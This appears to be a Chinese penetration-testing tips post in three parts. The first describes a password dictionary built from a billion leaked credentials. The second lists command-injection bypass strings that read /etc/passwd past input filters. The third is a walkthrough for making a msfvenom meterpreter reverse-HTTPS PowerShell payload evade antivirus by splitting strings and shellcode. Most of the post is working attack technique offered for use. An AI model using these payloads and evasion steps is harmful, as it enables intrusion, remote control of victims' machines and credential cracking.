目录
-
已泄露的密码整理出的字典与rockyou相差80%
-
命令注入Bypass
-
Powershell免杀
已泄露的密码整理出的字典与rockyou相差80%
https://github.com/FlameOfIgnis/Pwdb-Public
从网上泄露的10亿条数据中整理出的。里面257,669,588被筛选为损坏的数据或测试账户。
10亿个凭据可归结为168,919,919密码和393,386,953用户名.
平均密码长度为9.4822个字符
12.04%包含特殊字符,28.79%密码仅是字母,26.16%仅是小写,13.37%仅是数字,8.83%的密码仅被发现一次
与rockyou的对比,rockyou包含14,344,391个密码,本字典与rockyou相差80%
还有根据不同国家生成的小字典
命令注入Bypass
From: @shreyasrx
cat /etc/passwdcat /e"t"c/pa"s"swdcat /'e'tc/pa's'swdcat /etc/pa??wdcat /etc/pa*wdcat /et' 'c/passw''dcat /et$()c/pa$()$swdcat /et${neko}c/pas${poi} swd*echo "dwssap/cte/ tac" | rev$(echo Y2FOIC9ldGMvcGFzc3dkCg== base64 -d)whoami/bin/////shwho$@amixyz%0Acat%20/etc/passwdIFS=,;`cat<<<uname,-a`/???/??t/???/p??s??test=/ehhh/hmtc/pahhh/hmsswdcat ${test//hhh/hm/}cat ${test//hh??hm/}cat /???/?????d{cat,/etc/passwd}
Powershell免杀
生成
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=192.168.0.108 LPORT=443 -f psh-net -o shity_shellcode.ps1
先来测试一下,把ps1文件的shellcode换成一段无害的字符串
结果发现还是被查到了
这表明大多数检测来自PowerShell模板,而不是Shellcode本身。
下面几种bypass方法
-
将字符串分成几部分并创建中间变量;
-
添加大量垃圾备注;
-
添加一些垃圾指令,例如循环或睡眠指令(对于沙盒有用)。
[DllImport("kernel32.dll")]变为
[DllImport("ke"+"rne"+"l32.dll")]#可绕过赛门铁克
$przdE.ReferencedAssemblies.AddRange(@("System.dll",[PsObject].Assembly.Location))变为
$magic="Syst"+"em"+".dll";$przdE.ReferencedAssemblies.AddRange(@($magic,[PsObject].Assembly.Location))
分割shellcode
$sc0=<shellcode的第1部分>; …$sc7=<shellcode的第8部分>;[Byte[]]$tcomplete_sc=[System.Convert]::FromBase64String($sc0+$sc1+…+$sc7)
一些细节可参照
https://raw.githubusercontent.com/kmkz/Pentesting/master/AV_Evasion/AV_Bypass.ps1
我不太懂汇编语言,所以没有添加无害指令。
这里直接使用一键生成的bash脚本,有时间的可以读读里面的命令
https://github.com/darksh3llRU/tools/blob/master/psh-net_shellcode_fastchange.sh
这个脚本是生成个hta的,脚本以1337个字符来分块
我测试的时候1337个字符会被赛门铁克查杀到,我这里修改成250个字符来分块
因为我没加汇编指令,中间这里直接按任意键跳过即可,懂的可以在开头添加一些指令,例如xor,inc,dec,add,sub,mov,nop等
执行完后会生成一些文件
我们只用final_pshnet_revhttps.ps1这个文件,打开修改一下
修改成
效果
以上内容已经加入github,喜欢的点个star谢谢。
https://github.com/xiaoy-sec/Pentest_Note本文始发于微信公众号(关注安全技术):渗透Tips - 第十六期
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论